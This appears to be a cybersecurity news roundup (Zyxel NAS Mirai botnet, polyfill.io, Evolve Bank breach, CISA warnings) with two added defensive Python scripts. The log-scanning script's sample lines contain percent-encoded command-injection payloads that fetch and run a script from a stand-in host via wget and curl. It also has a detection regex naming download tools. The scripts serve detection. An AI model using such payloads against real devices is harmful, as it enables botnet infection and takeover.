Cybersecurity News: Gas chromatograph vulnerabilities, Cloudflare rebukes Polyfill, Evolve Bank breach

In today’s cybersecurity news…

Gas chromatograph vulnerabilities reveal medical IoT challenges

Security research firm Claroty has disclosed four vulnerabilities in Emerson's Rosemount 370XA gas chromatograph, a device used by hospitals for blood testing and by environmental facilities to measure air pollution. These devices are connected to internal networks and are “controlled remotely by technicians over a communication channel that leverages a proprietary protocol,” which gives threat actors another potential route into hospitals and other infrastructure. For context, CISA and Emerson both published advisories on these vulnerabilities in January, and a patch is available.

(Security Week)

We never authorized polyfill.io to use our name, says Cloudflare

Following up on the polyfill.io story we covered in yesterday’s newscast, CDN provider Cloudflare has stated that it “had not authorized the use of its name or logo on the Polyfill.io website,” criticizing that use as misleading to customers and adding on its blog that “this is yet another warning sign that Polyfill.io cannot be trusted.” As of this recording, Cloudflare continues to automatically replace polyfill.io links with a safe mirror on websites that use Cloudflare protection (including free plans), and polyfill.io is no longer online.
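The link replacement described above is something a site owner can also do at build or deploy time rather than relying on a CDN to do it. The following is an added example, not Cloudflare’s or polyfill.io’s code: it parses an HTML document, finds every `<script src>` and `<link href>` whose host is polyfill.io or a sub-domain of it, and rewrites those references to a mirror. The mirror hostname `polyfill-mirror.example.net` is a placeholder (the page does not name Cloudflare’s mirror), and the sample page is constructed.

```python
"""Find and rewrite <script src>/<link href> references to polyfill.io in HTML.

Added example, not Cloudflare's or polyfill.io's code. MIRROR_HOST is a placeholder
for a mirror you control or trust.
"""
import html as html_entities
from html.parser import HTMLParser
from urllib.parse import urlsplit, urlunsplit

# Domain from the story; sub-domains such as cdn.polyfill.io are matched as well.
SUSPECT_HOSTS = ("polyfill.io",)

# Assumption: a hypothetical mirror host. The page does not name Cloudflare's mirror.
MIRROR_HOST = "polyfill-mirror.example.net"


def is_suspect(url: str) -> bool:
    """True if the URL's host is polyfill.io or a sub-domain of it.

    Relative paths such as /static/app.js have no host and are never flagged;
    scheme-relative URLs (//polyfill.io/...) are.
    """
    host = (urlsplit(url.strip()).hostname or "").lower()
    return any(host == h or host.endswith("." + h) for h in SUSPECT_HOSTS)


class RefCollector(HTMLParser):
    """Collect the URL attribute of every <script src=...> and <link href=...>."""

    URL_ATTR = {"script": "src", "link": "href"}

    def __init__(self) -> None:
        super().__init__()
        self.refs: list[tuple[str, str]] = []

    def handle_starttag(self, tag, attrs):
        wanted = self.URL_ATTR.get(tag)
        if wanted is None:
            return
        for name, value in attrs:
            if name == wanted and value:
                self.refs.append((tag, value))


def find_polyfill_refs(document: str) -> list[tuple[str, str]]:
    """Return (tag, url) for every reference in the document that points at polyfill.io."""
    parser = RefCollector()
    parser.feed(document)
    parser.close()
    return [(tag, url) for tag, url in parser.refs if is_suspect(url)]


def rewrite_to_mirror(url: str) -> str:
    """Point the URL at MIRROR_HOST over https, keeping path and query (?features=...)."""
    parts = urlsplit(url.strip())
    return urlunsplit(("https", MIRROR_HOST, parts.path, parts.query, parts.fragment))


def rewrite_html(document: str) -> tuple[str, list[tuple[str, str]]]:
    """Rewrite every polyfill.io reference to the mirror.

    Returns the new document and the list of (old_url, new_url) substitutions.
    The parser hands back attribute values with entities decoded, so the raw
    document is searched for both the decoded and the entity-escaped form
    ('&' vs '&amp;' between query parameters), and the replacement is escaped
    to match the form it replaces.
    """
    changes = []
    for url in dict.fromkeys(u for _tag, u in find_polyfill_refs(document)):
        new_url = rewrite_to_mirror(url)
        for needle, replacement in (
            (url, new_url),
            (html_entities.escape(url, quote=False), html_entities.escape(new_url, quote=False)),
        ):
            document = document.replace(needle, replacement)
        changes.append((url, new_url))
    return document, changes


# Constructed sample page: three polyfill.io references mixed with legitimate ones.
SAMPLE_HTML = """<!doctype html>
<html><head>
<script src="https://cdn.polyfill.io/v3/polyfill.min.js?features=es6"></script>
<script src="//polyfill.io/v3/polyfill.min.js"></script>
<link rel="preload" as="script" href="https://cdn.polyfill.io/v3/polyfill.min.js?features=fetch&amp;flags=gated">
<script src="/static/app.js"></script>
<script src="https://example.com/vendor.js"></script>
</head><body></body></html>
"""

if __name__ == "__main__":
    new_doc, changes = rewrite_html(SAMPLE_HTML)
    for old, new in changes:
        print(f"{old} -> {new}")
    print(new_doc)
```

The host check deliberately matches sub-domains and scheme-relative URLs but not relative paths, so a site's own `/static/app.js` is never touched. Rewriting to a mirror keeps the page working; removing the tag entirely, where the polyfills are no longer needed, is the smaller attack surface.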

(BleepingComputer)

Evolve Bank confirms data breach, undermining LockBit’s Federal Reserve claim

Arkansas-based Evolve Bank & Trust confirmed this week the theft of customer information, which has now been posted on the dark web. Bank representatives say the information involved PII, including Social Security numbers, but not financial or banking information. The theft appears to be the work of hackers affiliated with LockBit, which had itself claimed to have breached the U.S. Federal Reserve. The first batch of documents it leaked, supposedly linked to the agency, reportedly belonged to Evolve Bank & Trust instead. Among them was a press release about the Federal Reserve’s enforcement action against Evolve Bank regarding deficiencies in anti-money laundering controls and risk management practices.

(The Record)

And now a word from our sponsor, Prelude

When executives ask the question “Are we vulnerable to this threat?”, how long does it take you to get a confident answer? Prelude automatically transforms threat intelligence into validated detections, so you can know with certainty in just a matter of minutes. Visit preludesecurity.com to upload your own threat intelligence and see for yourself.

DHS aims to streamline clearance approvals to increase headcount

As lawmakers at a House hearing pointed at the federal government’s “cumbersome hiring process that has undermined its ability to recruit cyber talent,” DHS CIO Eric Hysen responded that the department uses a “multipronged approach,” including its Cybersecurity Talent Management System and a review of clearance protocols, and that it is “looking to reduce requirements [and] expand the use of interim clearances at both the secret and top secret level.” This is just one of many proposals to address the estimated 500,000 vacant cyber-related jobs in the country.

(Cyberscoop)

Mirai-based botnet exploiting a recently disclosed vulnerability in Zyxel NAS devices

Researchers at the Shadowserver Foundation are warning of a Mirai-based botnet that is exploiting a recently disclosed vulnerability, rated CVSS 9.8, in end-of-life Zyxel NAS devices. The flaw is a command injection vulnerability in the “setCookie” parameter of Zyxel NAS326 firmware. Because proof-of-concept exploit code is publicly available, the researchers strongly recommend replacing the EoL devices. Further details are available in the show notes to this episode.
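Until an EoL device is pulled, the practical question for defenders is whether it has already been hit. The following is an added example, not Shadowserver’s or Zyxel’s code: it scans web-server or reverse-proxy access logs for requests that reach a “setCookie” parameter carrying shell metacharacters or the download-and-run tools Mirai droppers use, decoding percent-encoding first so that `%3B` (or double-encoded `%253B`) is seen as `;`. The “combined” log format, the request path `/cgi-bin/example/setCookie` and the payloads are constructed for illustration; the page only states that the flaw is command injection via the setCookie parameter.

```python
"""Flag HTTP requests carrying command-injection payloads in a setCookie parameter.

Added example, not Shadowserver's or Zyxel's code. The log format, request path
and payloads below are constructed; the page only says the flaw is command
injection via the "setCookie" parameter.
"""
import re
from urllib.parse import unquote

# Apache/nginx "combined" log line up to the status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3})'
)

# Shell metacharacters and download/exec tools typical of Mirai-style droppers.
# '&' is deliberately absent: it is a normal query-string separator.
SHELL_INJECTION = re.compile(r"[;|`]|\$\(|\b(?:wget|curl|tftp|chmod|busybox)\b")


def fully_decode(s: str, rounds: int = 3) -> str:
    """Percent-decode until stable (bounded), so %3B and %253B both become ';'."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def inspect_line(line: str):
    """Return (ip, reason) if the request is a suspicious hit on setCookie, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = fully_decode(m["target"])
    if "setcookie" not in target.lower():
        return None
    hit = SHELL_INJECTION.search(target)
    if hit:
        return (m["ip"], f"shell metacharacter/command {hit.group(0)!r} in setCookie request")
    if m["method"] == "POST":
        # The body is not in the access log; a POST to the endpoint still merits review.
        return (m["ip"], "POST to setCookie endpoint (payload not logged)")
    return None


def scan(lines):
    """Run inspect_line over an iterable of log lines and keep the hits."""
    return [hit for hit in map(inspect_line, lines) if hit]


# Constructed access-log lines (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    '198.51.100.23 - - [26/Jun/2024:10:14:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [26/Jun/2024:10:14:05 +0000] "GET /cgi-bin/example/setCookie?c=%3Bwget%20http%3A%2F%2F203.0.113.77%2Fbot.sh%3Bsh%20bot.sh HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '192.0.2.15 - - [26/Jun/2024:10:15:11 +0000] "GET /cgi-bin/example/setCookie?c=session123 HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [26/Jun/2024:10:15:40 +0000] "POST /cgi-bin/example/setCookie HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [26/Jun/2024:10:16:03 +0000] "GET /cgi-bin/example/setCookie?c=%2524(curl%2520http%253A%252F%252F203.0.113.77%252Fx) HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, reason in scan(SAMPLE_LOG):
        print(f"{ip}: {reason}")
```

The decoding step is the part a plain `grep` for `;` or `wget` misses: the dropper commands arrive percent-encoded, sometimes twice. A legitimate `setCookie?c=session123` request is left alone, while a POST to the same endpoint is surfaced at lower confidence because the body never reaches the access log.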

(Security Affairs)

Most critical open source projects not using memory safe code, says CISA

The agency, working with the FBI and Australian and Canadian authorities, has published research that examined 172 key open-source projects to determine whether they are susceptible to memory flaws. The goal of the report is to raise awareness of the importance of memory-safe code, which is designed to prevent common memory-related errors such as buffer overflows, use-after-free, and other types of memory corruption. Among the report’s findings: “52% of critical open-source projects analyzed contain code written in memory-unsafe languages, 55% of the total lines of code (LoC) across these projects are written in memory-unsafe languages, and the largest projects are disproportionately written in memory-unsafe languages.” The report also highlights “the problem of developers disabling memory-safety features, either by error or on purpose, to meet specific requirements, resulting in risks even when using theoretically safer building blocks.”

(BleepingComputer)

CISA warns of vulnerabilities being exploited in GeoServer, Linux Kernel, and Roundcube

These three warnings were issued on Wednesday for three separate issues observed being exploited in the wild by threat actors. The GeoServer flaw has a CVSS score of 9.8 and is described as a code injection flaw that can be exploited to achieve remote code execution. The Linux kernel flaw is a use-after-free issue in the netfilter nf_tables subsystem that can lead to privilege escalation. The Roundcube flaw is a four-year-old vulnerability in Roundcube Webmail versions before 1.4.5, described as a cross-site scripting (XSS) issue that can be triggered via malicious XML attachments; Roundcube released patches for it in early June 2020.

(Security Week)

Steve Prentice
Author, speaker, expert in the area where people and technology crash into each other, viewed from the organizational psychology perspective. Host of many podcasts, voice actor and narrator for corporate media and audiobooks. Ghost-writer for busy executives.